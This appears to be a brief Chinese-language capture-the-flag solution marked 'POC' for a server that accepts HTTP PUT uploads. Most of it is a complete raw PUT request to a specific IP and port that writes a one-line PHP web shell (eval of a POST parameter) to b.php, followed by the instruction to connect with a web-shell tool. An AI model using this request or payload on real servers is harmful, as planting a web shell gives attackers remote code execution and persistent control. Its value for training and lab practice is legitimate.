POC
这题只需要知道它允许PUT协议即可,当我们知道它可以上传文件后,直接构造如下的报文即可(可以使用nikto扫描,使用教程请参考nikto使用教程一文
PUT /b.php HTTP/1.1
Host: 1.14.71.254:28202
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29
<?php eval($_POST[a]); ?>这样子就可以将木马上传到b.php然后用webshell工具连接即可